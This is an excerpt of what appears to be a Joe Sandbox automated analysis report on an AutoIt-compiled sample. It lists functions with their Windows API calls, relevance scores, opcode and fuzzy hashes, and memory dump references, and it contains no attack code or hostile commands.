                        • API String ID: 145871493-2590602151
                        • Opcode ID: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                        • Instruction ID: 1e14141e35c353131c87f7ee00333b0ffb3ef425a40f1e48751b672d4583e496
                        • Opcode Fuzzy Hash: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                        • Instruction Fuzzy Hash: 01F05538845B20ABD73337108C08E69B31CAF00701F5A95D9F80BE20C4CB70DD408782
                        Function 00334E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                        • FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-3689287502
                        • Opcode ID: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                        • Instruction ID: f1e1ab08cea6cf18bc1318c59ea0a06f77c1559a543eb241ccc7b4da194c8678
                        • Opcode Fuzzy Hash: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                        • Instruction Fuzzy Hash: 8DE0CD35E125225BD23317266C18F6FA55CAFC1F62F0A0115FD09D2210DB60ED0242A0
                        Function 00334E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                        • FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-1355242751
                        • Opcode ID: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                        • Instruction ID: bdcf479038da21fac66f2d4b2ac29d7d3b3e368edfec3395e219c6b12f0ad368
                        • Opcode Fuzzy Hash: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                        • Instruction Fuzzy Hash: 87D05B369126315756331B66BC1CEDF6A1CAF85F52B0A1515F90DE2114CF60ED02C7D0
                        Function 003BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 003BA427
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BA435
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BA468
                        • CloseHandle.KERNEL32(?), ref: 003BA63D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID:
                        • API String ID: 3488606520-0
                        • Opcode ID: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                        • Instruction ID: 958960a49654da01ba0cf19cd4ffe243457c0b4a181f2a23d8ccf5cf024afa7a
                        • Opcode Fuzzy Hash: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                        • Instruction Fuzzy Hash: 53A1B175604700AFD721DF24C886F2AB7E5AF84714F14881DF69A9F792DB70EC418B92
                        Function 0036BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                        • _free.LIBCMT ref: 0036BB7F
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036BD4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                        • Instruction ID: 3c1fa9cb9c37e2ad0fc86afb405064e7a7cf991b02963623b79964e2eb46c018
                        • Opcode Fuzzy Hash: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                        • Instruction Fuzzy Hash: 15510A719002099FC712DF659D8196EF7BCEF41350F11826AE554EB2A9EB309E818F54
                        Function 0039E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • lstrcmpiW.KERNEL32(?,?), ref: 0039E473
                        • MoveFileW.KERNEL32(?,?), ref: 0039E4AC
                        • _wcslen.LIBCMT ref: 0039E5EB
                        • _wcslen.LIBCMT ref: 0039E603
                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0039E650
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                        • String ID:
                        • API String ID: 3183298772-0
                        • Opcode ID: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                        • Instruction ID: 9d367ade4dc69f27ab2a31053f0fda3f56ce9cde9a2addb7b77e17940341b2ce
                        • Opcode Fuzzy Hash: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                        • Instruction Fuzzy Hash: 525141B24083459BCB26DB94D881EDFB3ECAF85340F00491EF589D7191EF74A688C766
                        Function 003BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBAA5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBB00
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003BBB63
                        • RegCloseKey.ADVAPI32(?,?), ref: 003BBBA6
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBBB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                        • String ID:
                        • API String ID: 826366716-0
                        • Opcode ID: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                        • Instruction ID: 639a6c44f798f4a7b9ba16b7f86c721847dc988a41d0f04f78a9cd09de1b61a7
                        • Opcode Fuzzy Hash: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                        • Instruction Fuzzy Hash: 8F61AD31608201EFD316DF14C890E6ABBE9FF84308F14859DF5998B6A2CB71ED45CB92
                        Function 00398BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00398BCD
                        • VariantClear.OLEAUT32 ref: 00398C3E
                        • VariantClear.OLEAUT32 ref: 00398C9D
                        • VariantClear.OLEAUT32(?), ref: 00398D10
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00398D3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType
                        • String ID:
                        • API String ID: 4136290138-0
                        • Opcode ID: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                        • Instruction ID: 3c793f7b76a88bbc1dcc37bfbf5bc16f507c36b18f0a364cd25c84b83973ea36
                        • Opcode Fuzzy Hash: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                        • Instruction Fuzzy Hash: 5D5145B5A00619EFCB15CF68C894AAAB7F8FF89314B158559E909DB350E730E911CF90
                        Function 003A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A8BAE
                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003A8BDA
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A8C32
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A8C57
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A8C5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: c6c3a0509773fd1e1737de78ba044c21f2d44fecad926d0afd0d0f7ea0da0fb4
                        • Instruction ID: 06ddc51ca63aaa7d1a244079a263ef3db971b1cf23f2b551915469ba50e4e175
                        • Opcode Fuzzy Hash: c6c3a0509773fd1e1737de78ba044c21f2d44fecad926d0afd0d0f7ea0da0fb4
                        • Instruction Fuzzy Hash: 46513975A00218AFDB16DF65C880A69BBF5FF49314F088458E849AF362CB31ED51CF90
                        Function 003B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 003B8F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B8FEC
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B9032
                        • FreeLibrary.KERNEL32(00000000), ref: 003B9052
                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003A1043,?,7644E610), ref: 0034F6E6
                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0038FA64,00000000,00000000,?,?,003A1043,?,7644E610,?,0038FA64), ref: 0034F70D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                        • String ID:
                        • API String ID: 666041331-0
                        • Opcode ID: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                        • Instruction ID: 8d24ec9d328099b3fb8ceb2b4a67339d96734158abd58912dd914a3146f0ae6f
                        • Opcode Fuzzy Hash: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                        • Instruction Fuzzy Hash: 17513935604205DFCB12EF54C4849ADBBB5FF49318F098099EA0A9F762DB31ED86CB90
                        Function 003C6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 003C6C33
                        • SetWindowLongW.USER32(?,000000EC,?), ref: 003C6C4A
                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003C6C73
                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003AAB79,00000000,00000000), ref: 003C6C98
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003C6CC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long$MessageSendShow
                        • String ID:
                        • API String ID: 3688381893-0
                        • Opcode ID: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                        • Instruction ID: c1cf39746cc460a2c5bbc83addf2407af8b1f4a11d8e3a3b00dca74bd7b253bc
                        • Opcode Fuzzy Hash: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                        • Instruction Fuzzy Hash: F441D535A04104AFD726CF28CD5AFA97BA9EB09350F16422CF899E72E1C771ED41CB40
                        Function 00362051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                        • Instruction ID: 0208b904a2b4c30c98fd4c8f48059fc68711eeb4312fa82ef1f96fbfa1c50f18
                        • Opcode Fuzzy Hash: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                        • Instruction Fuzzy Hash: 3A41D032A006049FCB26DF78C980A6EB3E5EF89314F168568E915EF359DA31AD01CB80
                        Function 0034912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00349141
                        • ScreenToClient.USER32(00000000,?), ref: 0034915E
                        • GetAsyncKeyState.USER32(00000001), ref: 00349183
                        • GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                        • Instruction ID: 135b0d91a3e15726c470ee0bfa678a4195f69533ae4d09773cd8ebce469a58de
                        • Opcode Fuzzy Hash: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                        • Instruction Fuzzy Hash: F341527190861AFBDF16AF64C848BEEB7B5FF05320F25825AE429A72D0C730AD54CB51
                        Function 003A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 003A38CB
                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003A3922
                        • TranslateMessage.USER32(?), ref: 003A394B
                        • DispatchMessageW.USER32(?), ref: 003A3955
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                        • String ID:
                        • API String ID: 2256411358-0
                        • Opcode ID: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                        • Instruction ID: 666a6293832412970d8499ed08e0462e9a94d6a868f9a31a2c7e325f00925737
                        • Opcode Fuzzy Hash: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                        • Instruction Fuzzy Hash: D831A0719083429FEB27CB759948FB737ACEB07304F05456DF466D25A0E3B4AA89CB11
                        Function 003ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 003ACF38
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 003ACF6F
                        • GetLastError.KERNEL32(?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFB4
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFC8
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                        • String ID:
                        • API String ID: 3191363074-0
                        • Opcode ID: 974bfd77014e7a337eb2199c804fe7cbb42651b33a7d578c8c7748ff8efc8b99
                        • Instruction ID: 5e23b4366e42983db05bd598aa1af3bc4662662d590d63b62fa4df687bc0e87d
                        • Opcode Fuzzy Hash: 974bfd77014e7a337eb2199c804fe7cbb42651b33a7d578c8c7748ff8efc8b99
                        • Instruction Fuzzy Hash: DB318E71914205EFDB22DFA5C884EABBBFDEB16310F10542EF50AD6501DB30AE41DB60
                        Function 00391901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00391915
                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 003919C1
                        • Sleep.KERNEL32(00000000,?,?,?), ref: 003919C9
                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 003919DA
                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003919E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
                        • Instruction ID: 7e6f2beacb503c60fdb3e1b23c8f24ea926060246692ca022bec740be3998c4f
                        • Opcode Fuzzy Hash: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
